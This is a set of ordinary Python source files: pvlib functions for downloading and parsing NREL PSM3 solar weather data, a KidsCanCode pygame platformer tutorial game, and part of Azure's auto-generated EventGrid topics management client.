| TMY | tmy, tmy-2016, tmy-2017, tdy-2017, tgy-2017, |
| | tmy-2018, tdy-2018, tgy-2018, tmy-2019, tdy-2019, tgy-2019 |
+-----------+-------------------------------------------------------------+
.. warning:: PSM3 is limited to data found in the NSRDB, please consult the
references below for locations with available data. Additionally,
querying data with < 30-minute resolution uses a different API endpoint
with fewer available fields (see [4]_).
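    Examples
    --------
    >>> # A hypothetical TMY request; the api_key and email values below are
    >>> # placeholders for your own NREL Developer Network credentials.
    >>> df, metadata = iotools.get_psm3(39.741, -105.171, 'DEMO_KEY',
    ...                                 'user@example.com')  # doctest: +SKIP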
See Also
--------
pvlib.iotools.read_psm3, pvlib.iotools.parse_psm3
References
----------
.. [1] `NREL National Solar Radiation Database (NSRDB)
<https://nsrdb.nrel.gov/>`_
.. [2] `Physical Solar Model (PSM) v3
<https://developer.nrel.gov/docs/solar/nsrdb/psm3-download/>`_
.. [3] `Physical Solar Model (PSM) v3 TMY
<https://developer.nrel.gov/docs/solar/nsrdb/psm3-tmy-download/>`_
.. [4] `Physical Solar Model (PSM) v3 - Five Minute Temporal Resolution
<https://developer.nrel.gov/docs/solar/nsrdb/psm3-5min-download/>`_
"""
    # The well-known text (WKT) representation of geometry is strict.
# A POINT object is a string with longitude first, then the latitude, with
# four decimals each, and exactly one space between them.
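    # For example, lat=39.74, lon=-105.18 becomes 'POINT(-105.1800 39.7400)'.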
longitude = ('%9.4f' % longitude).strip()
latitude = ('%8.4f' % latitude).strip()
# TODO: make format_WKT(object_type, *args) in tools.py
    # convert to string to accommodate integer years being passed in
names = str(names)
# required query-string parameters for request to PSM3 API
params = {
'api_key': api_key,
'full_name': full_name,
'email': email,
'affiliation': affiliation,
'reason': PVLIB_PYTHON,
'mailing_list': 'false',
'wkt': 'POINT(%s %s)' % (longitude, latitude),
'names': names,
'attributes': ','.join(attributes),
'leap_day': str(leap_day).lower(),
'utc': 'false',
'interval': interval
}
# request CSV download from NREL PSM3
if any(prefix in names for prefix in ('tmy', 'tgy', 'tdy')):
URL = TMY_URL
elif interval in (5, 15):
URL = PSM5MIN_URL
else:
URL = PSM_URL
response = requests.get(URL, params=params, timeout=timeout)
if not response.ok:
# if the API key is rejected, then the response status will be 403
# Forbidden, and then the error is in the content and there is no JSON
try:
errors = response.json()['errors']
except JSONDecodeError:
errors = response.content.decode('utf-8')
raise requests.HTTPError(errors, response=response)
# the CSV is in the response content as a UTF-8 bytestring
# to use pandas we need to create a file buffer from the response
fbuf = io.StringIO(response.content.decode('utf-8'))
return parse_psm3(fbuf)
def parse_psm3(fbuf):
"""
Parse an NSRDB PSM3 weather file (formatted as SAM CSV). The NSRDB
is described in [1]_ and the SAM CSV format is described in [2]_.
.. versionchanged:: 0.9.0
The function now returns a tuple where the first element is a dataframe
and the second element is a dictionary containing metadata. Previous
versions of this function had the return values switched.
Parameters
----------
fbuf: file-like object
File-like object containing data to read.
Returns
-------
data : pandas.DataFrame
timeseries data from NREL PSM3
metadata : dict
metadata from NREL PSM3 about the record, see notes for fields
Notes
-----
The return is a tuple with two items. The first item is a dataframe with
the PSM3 timeseries data.
The second item is a dictionary with metadata from NREL PSM3 about the
record containing the following fields:
* Source
* Location ID
* City
* State
* Country
* Latitude
* Longitude
* Time Zone
* Elevation
* Local Time Zone
* Clearsky DHI Units
* Clearsky DNI Units
* Clearsky GHI Units
* Dew Point Units
* DHI Units
* DNI Units
* GHI Units
* Solar Zenith Angle Units
* Temperature Units
* Pressure Units
* Relative Humidity Units
* Precipitable Water Units
* Wind Direction Units
* Wind Speed Units
* Cloud Type -15
* Cloud Type 0
* Cloud Type 1
* Cloud Type 2
* Cloud Type 3
* Cloud Type 4
* Cloud Type 5
* Cloud Type 6
* Cloud Type 7
* Cloud Type 8
* Cloud Type 9
* Cloud Type 10
* Cloud Type 11
* Cloud Type 12
* Fill Flag 0
* Fill Flag 1
* Fill Flag 2
* Fill Flag 3
* Fill Flag 4
* Fill Flag 5
* Surface Albedo Units
* Version
Examples
--------
>>> # Read a local PSM3 file:
>>> with open(filename, 'r') as f: # doctest: +SKIP
... df, metadata = iotools.parse_psm3(f) # doctest: +SKIP
See Also
--------
pvlib.iotools.read_psm3, pvlib.iotools.get_psm3
References
----------
.. [1] `NREL National Solar Radiation Database (NSRDB)
<https://nsrdb.nrel.gov/>`_
.. [2] `Standard Time Series Data File Format
<https://rredc.nrel.gov/solar/old_data/nsrdb/2005-2012/wfcsv.pdf>`_
"""
# The first 2 lines of the response are headers with metadata
metadata_fields = fbuf.readline().split(',')
metadata_fields[-1] = metadata_fields[-1].strip() # strip trailing newline
metadata_values = fbuf.readline().split(',')
metadata_values[-1] = metadata_values[-1].strip() # strip trailing newline
metadata = dict(zip(metadata_fields, metadata_values))
# the response is all strings, so set some metadata types to numbers
metadata['Local Time Zone'] = int(metadata['Local Time Zone'])
metadata['Time Zone'] = int(metadata['Time Zone'])
metadata['Latitude'] = float(metadata['Latitude'])
metadata['Longitude'] = float(metadata['Longitude'])
metadata['Elevation'] = int(metadata['Elevation'])
# get the column names so we can set the dtypes
columns = fbuf.readline().split(',')
columns[-1] = columns[-1].strip() # strip trailing newline
    # Since the header has so many columns, Excel saves blank columns in
    # the data rows below the header lines.
columns = [col for col in columns if col != '']
dtypes = dict.fromkeys(columns, float) # all floats except datevec
dtypes.update(Year=int, Month=int, Day=int, Hour=int, Minute=int)
dtypes['Cloud Type'] = int
dtypes['Fill Flag'] = int
data = pd.read_csv(
fbuf, header=None, names=columns, usecols=columns, dtype=dtypes,
delimiter=',', lineterminator='\n') # skip carriage returns \r
    # the first 5 columns of the response are a date vector; convert to datetime
dtidx = pd.to_datetime(
data[['Year', 'Month', 'Day', 'Hour', 'Minute']])
    # in the USA, all time zones are whole-hour offsets from UTC
tz = 'Etc/GMT%+d' % -metadata['Time Zone']
data.index = pd.DatetimeIndex(dtidx).tz_localize(tz)
return data, metadata
def read_psm3(filename):
"""
Read an NSRDB PSM3 weather file (formatted as SAM CSV). The NSRDB
is described in [1]_ and the SAM CSV format is described in [2]_.
.. versionchanged:: 0.9.0
The function now returns a tuple where the first element is a dataframe
and the second element is a dictionary containing metadata. Previous
versions of this function had the return values switched.
Parameters
----------
filename: str
Filename of a file containing data to read.
Returns
-------
data : pandas.DataFrame
timeseries data from NREL PSM3
metadata : dict
metadata from NREL PSM3 about the record, see
:func:`pvlib.iotools.parse_psm3` for fields
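    Examples
    --------
    >>> # Read a previously downloaded PSM3 file; 'psm3.csv' is a
    >>> # placeholder filename.
    >>> df, metadata = iotools.read_psm3('psm3.csv')  # doctest: +SKIP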
See Also
--------
pvlib.iotools.parse_psm3, pvlib.iotools.get_psm3
References
----------
.. [1] `NREL National Solar Radiation Database (NSRDB)
<https://nsrdb.nrel.gov/>`_
.. [2] `Standard Time Series Data File Format
<https://rredc.nrel.gov/solar/old_data/nsrdb/2005-2012/wfcsv.pdf>`_
"""
with open(str(filename), 'r') as fbuf:
content = parse_psm3(fbuf)
return content
|
|
# KidsCanCode - Game Development with Pygame video series
# Jumpy! (a platform game) - Part 17
# Video link: https://youtu.be/Dspz3kaTKUg
# Using mask collisions
# Art from Kenney.nl
# Happy Tune by http://opengameart.org/users/syncopika
# Yippee by http://opengameart.org/users/snabisch
import pygame as pg
import random
from settings import *
from sprites import *
from os import path
class Game:
def __init__(self):
# initialize game window, etc
pg.init()
pg.mixer.init()
self.screen = pg.display.set_mode((WIDTH, HEIGHT))
pg.display.set_caption(TITLE)
self.clock = pg.time.Clock()
self.running = True
self.font_name = pg.font.match_font(FONT_NAME)
self.load_data()
def load_data(self):
# load high score
self.dir = path.dirname(__file__)
        # fall back to 0 if the file is missing or doesn't hold an integer
        try:
            with open(path.join(self.dir, HS_FILE), 'r') as f:
                self.highscore = int(f.read())
        except (IOError, ValueError):
            self.highscore = 0
# load spritesheet image
img_dir = path.join(self.dir, 'img')
self.spritesheet = Spritesheet(path.join(img_dir, SPRITESHEET))
# load sounds
self.snd_dir = path.join(self.dir, 'snd')
self.jump_sound = pg.mixer.Sound(path.join(self.snd_dir, 'Jump33.wav'))
self.boost_sound = pg.mixer.Sound(path.join(self.snd_dir, 'Boost16.wav'))
def new(self):
# start a new game
self.score = 0
self.all_sprites = pg.sprite.LayeredUpdates()
self.platforms = pg.sprite.Group()
self.powerups = pg.sprite.Group()
self.mobs = pg.sprite.Group()
self.player = Player(self)
for plat in PLATFORM_LIST:
Platform(self, *plat)
self.mob_timer = 0
pg.mixer.music.load(path.join(self.snd_dir, 'Happy Tune.ogg'))
self.run()
def run(self):
# Game Loop
pg.mixer.music.play(loops=-1)
self.playing = True
while self.playing:
self.clock.tick(FPS)
self.events()
self.update()
self.draw()
pg.mixer.music.fadeout(500)
def update(self):
# Game Loop - Update
self.all_sprites.update()
# spawn a mob?
now = pg.time.get_ticks()
if now - self.mob_timer > 5000 + random.choice([-1000, -500, 0, 500, 1000]):
self.mob_timer = now
Mob(self)
# hit mobs?
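        # collide_mask compares the sprites' per-pixel masks instead of
        # their bounding rects, giving precise (but slower) hit detection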
mob_hits = pg.sprite.spritecollide(self.player, self.mobs, False, pg.sprite.collide_mask)
if mob_hits:
self.playing = False
# check if player hits a platform - only if falling
if self.player.vel.y > 0:
hits = pg.sprite.spritecollide(self.player, self.platforms, False)
if hits:
lowest = hits[0]
for hit in hits:
if hit.rect.bottom > lowest.rect.bottom:
lowest = hit
if self.player.pos.x < lowest.rect.right + 10 and \
self.player.pos.x > lowest.rect.left - 10:
if self.player.pos.y < lowest.rect.centery:
self.player.pos.y = lowest.rect.top
self.player.vel.y = 0
self.player.jumping = False
# if player reaches top 1/4 of screen
if self.player.rect.top <= HEIGHT / 4:
self.player.pos.y += max(abs(self.player.vel.y), 2)
for mob in self.mobs:
mob.rect.y += max(abs(self.player.vel.y), 2)
for plat in self.platforms:
plat.rect.y += max(abs(self.player.vel.y), 2)
if plat.rect.top >= HEIGHT:
plat.kill()
self.score += 10
# if player hits powerup
pow_hits = pg.sprite.spritecollide(self.player, self.powerups, True)
        for powerup in pow_hits:
            if powerup.type == 'boost':
self.boost_sound.play()
self.player.vel.y = -BOOST_POWER
self.player.jumping = False
# Die!
if self.player.rect.bottom > HEIGHT:
for sprite in self.all_sprites:
sprite.rect.y -= max(self.player.vel.y, 10)
if sprite.rect.bottom < 0:
sprite.kill()
if len(self.platforms) == 0:
self.playing = False
# spawn new platforms to keep same average number
while len(self.platforms) < 6:
width = random.randrange(50, 100)
Platform(self, random.randrange(0, WIDTH - width),
random.randrange(-75, -30))
def events(self):
# Game Loop - events
for event in pg.event.get():
# check for closing window
if event.type == pg.QUIT:
if self.playing:
self.playing = False
self.running = False
if event.type == pg.KEYDOWN:
if event.key == pg.K_SPACE:
self.player.jump()
if event.type == pg.KEYUP:
if event.key == pg.K_SPACE:
self.player.jump_cut()
def draw(self):
# Game Loop - draw
self.screen.fill(BGCOLOR)
self.all_sprites.draw(self.screen)
self.draw_text(str(self.score), 22, WHITE, WIDTH / 2, 15)
# *after* drawing everything, flip the display
pg.display.flip()
def show_start_screen(self):
# game splash/start screen
pg.mixer.music.load(path.join(self.snd_dir, 'Yippee.ogg'))
pg.mixer.music.play(loops=-1)
self.screen.fill(BGCOLOR)
self.draw_text(TITLE, 48, WHITE, WIDTH / 2, HEIGHT / 4)
self.draw_text("Arrows to move, Space to jump", 22, WHITE, WIDTH / 2, HEIGHT / 2)
self.draw_text("Press a key to play", 22, WHITE, WIDTH / 2, HEIGHT * 3 / 4)
self.draw_text("High Score: " + str(self.highscore), 22, WHITE, WIDTH / 2, 15)
pg.display.flip()
self.wait_for_key()
pg.mixer.music.fadeout(500)
def show_go_screen(self):
# game over/continue
if not self.running:
return
pg.mixer.music.load(path.join(self.snd_dir, 'Yippee.ogg'))
pg.mixer.music.play(loops=-1)
self.screen.fill(BGCOLOR)
self.draw_text("GAME OVER", 48, WHITE, WIDTH / 2, HEIGHT / 4)
self.draw_text("Score: " + str(self.score), 22, WHITE, WIDTH / 2, HEIGHT / 2)
self.draw_text("Press a key to play again", 22, WHITE, WIDTH / 2, HEIGHT * 3 / 4)
if self.score > self.highscore:
self.highscore = self.score
self.draw_text("NEW HIGH SCORE!", 22, WHITE, WIDTH / 2, HEIGHT / 2 + 40)
with open(path.join(self.dir, HS_FILE), 'w') as f:
f.write(str(self.score))
else:
self.draw_text("High Score: " + str(self.highscore), 22, WHITE, WIDTH / 2, HEIGHT / 2 + 40)
pg.display.flip()
self.wait_for_key()
pg.mixer.music.fadeout(500)
def wait_for_key(self):
waiting = True
while waiting:
self.clock.tick(FPS)
for event in pg.event.get():
if event.type == pg.QUIT:
waiting = False
self.running = False
if event.type == pg.KEYUP:
waiting = False
def draw_text(self, text, size, color, x, y):
font = pg.font.Font(self.font_name, size)
text_surface = font.render(text, True, color)
text_rect = text_surface.get_rect()
text_rect.midtop = (x, y)
self.screen.blit(text_surface, text_rect)
g = Game()
g.show_start_screen()
while g.running:
g.new()
g.show_go_screen()
pg.quit()
|
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import functools
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from msrest import Serializer
from .. import models as _models
from .._vendor import _convert_request, _format_url_section
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
_SERIALIZER = Serializer()
_SERIALIZER.client_side_validation = False
# fmt: off
def build_get_request(
subscription_id, # type: str
resource_group_name, # type: str
topic_name, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
api_version = "2021-12-01"
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventGrid/topics/{topicName}')
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str'),
"topicName": _SERIALIZER.url("topic_name", topic_name, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_create_or_update_request_initial(
subscription_id, # type: str
resource_group_name, # type: str
topic_name, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
content_type = kwargs.pop('content_type', None) # type: Optional[str]
api_version = "2021-12-01"
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventGrid/topics/{topicName}')
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str'),
"topicName": _SERIALIZER.url("topic_name", topic_name, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
if content_type is not None:
header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="PUT",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_delete_request_initial(
subscription_id, # type: str
resource_group_name, # type: str
topic_name, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
api_version = "2021-12-01"
# Construct URL
url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventGrid/topics/{topicName}')
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str'),
"topicName": _SERIALIZER.url("topic_name", topic_name, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
return HttpRequest(
method="DELETE",
url=url,
params=query_parameters,
**kwargs
)
def build_update_request_initial(
subscription_id, # type: str
resource_group_name, # type: str
topic_name, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
content_type = kwargs.pop('content_type', None) # type: Optional[str]
api_version = "2021-12-01"
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventGrid/topics/{topicName}')
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str'),
"topicName": _SERIALIZER.url("topic_name", topic_name, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
if content_type is not None:
header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="PATCH",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_list_by_subscription_request(
subscription_id, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
filter = kwargs.pop('filter', None) # type: Optional[str]
top = kwargs.pop('top', None) # type: Optional[int]
api_version = "2021-12-01"
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/providers/Microsoft.EventGrid/topics')
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
if filter is not None:
query_parameters['$filter'] = _SERIALIZER.query("filter", filter, 'str')
if top is not None:
query_parameters['$top'] = _SERIALIZER.query("top", top, 'int')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_list_by_resource_group_request(
subscription_id, # type: str
resource_group_name, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
filter = kwargs.pop('filter', None) # type: Optional[str]
top = kwargs.pop('top', None) # type: Optional[int]
api_version = "2021-12-01"
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventGrid/topics')
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
if filter is not None:
query_parameters['$filter'] = _SERIALIZER.query("filter", filter, 'str')
if top is not None:
query_parameters['$top'] = _SERIALIZER.query("top", top, 'int')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_list_shared_access_keys_request(
subscription_id, # type: str
resource_group_name, # type: str
topic_name, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
api_version = "2021-12-01"
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventGrid/topics/{topicName}/listKeys')
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str'),
"topicName": _SERIALIZER.url("topic_name", topic_name, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="POST",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_regenerate_key_request_initial(
subscription_id, # type: str
resource_group_name, # type: str
topic_name, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
content_type = kwargs.pop('content_type', None) # type: Optional[str]
api_version = "2021-12-01"
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventGrid/topics/{topicName}/regenerateKey')
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str'),
"topicName": _SERIALIZER.url("topic_name", topic_name, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
if content_type is not None:
header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="POST",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_list_event_types_request(
subscription_id, # type: str
resource_group_name, # type: str
provider_namespace, # type: str
resource_type_name, # type: str
resource_name, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
api_version = "2021-12-01"
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{providerNamespace}/{resourceTypeName}/{resourceName}/providers/Microsoft.EventGrid/eventTypes')
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str'),
"providerNamespace": _SERIALIZER.url("provider_namespace", provider_namespace, 'str'),
"resourceTypeName": _SERIALIZER.url("resource_type_name", resource_type_name, 'str'),
"resourceName": _SERIALIZER.url("resource_name", resource_name, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
# fmt: on
class TopicsOperations(object):
"""TopicsOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.eventgrid.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
@distributed_trace
def get(
self,
resource_group_name, # type: str
topic_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.Topic"
"""Get a topic.
Get properties of a topic.
:param resource_group_name: The name of the resource group within the user's subscription.
:type resource_group_name: str
:param topic_name: Name of the topic.
:type topic_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Topic, or the result of cls(response)
:rtype: ~azure.mgmt.eventgrid.models.Topic
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Topic"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
topic_name=topic_name,
template_url=self.get.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('Topic', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventGrid/topics/{topicName}'} # type: ignore
def _create_or_update_initial(
self,
resource_group_name, # type: str
topic_name, # type: str
topic_info, # type: "_models.Topic"
**kwargs # type: Any
):
# type: (...) -> "_models.Topic"
cls = kwargs.pop('cls', None) # type: ClsType["_models.Topic"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(topic_info, 'Topic')
request = build_create_or_update_request_initial(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
topic_name=topic_name,
content_type=content_type,
json=_json,
template_url=self._create_or_update_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('Topic', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventGrid/topics/{topicName}'} # type: ignore
@distributed_trace
def begin_create_or_update(
self,
resource_group_name, # type: str
topic_name, # type: str
topic_info, # type: "_models.Topic"
**kwargs # type: Any
):
# type: (...) -> LROPoller["_models.Topic"]
"""Create a topic.
Asynchronously creates a new topic with the specified parameters.
:param resource_group_name: The name of the resource group within the user's subscription.
:type resource_group_name: str
:param topic_name: Name of the topic.
:type topic_name: str
:param topic_info: Topic information.
:type topic_info: ~azure.mgmt.eventgrid.models.Topic
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either Topic or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.eventgrid.models.Topic]
:raises: ~azure.core.exceptions.HttpResponseError
"""
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
polling = kwargs.pop('polling', True) # type: Union[bool, azure.core.polling.PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.Topic"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._create_or_update_initial(
resource_group_name=resource_group_name,
topic_name=topic_name,
topic_info=topic_info,
content_type=content_type,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
deserialized = self._deserialize('Topic', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventGrid/topics/{topicName}'} # type: ignore
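    # A minimal usage sketch (assuming an authenticated management client
    # `client` exposing this operation group as `client.topics`; the resource
    # names are placeholders):
    #
    #     poller = client.topics.begin_create_or_update(
    #         'my-resource-group', 'my-topic',
    #         _models.Topic(location='westus2'))
    #     topic = poller.result()  # blocks until the LRO completes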
def _delete_initial(
self,
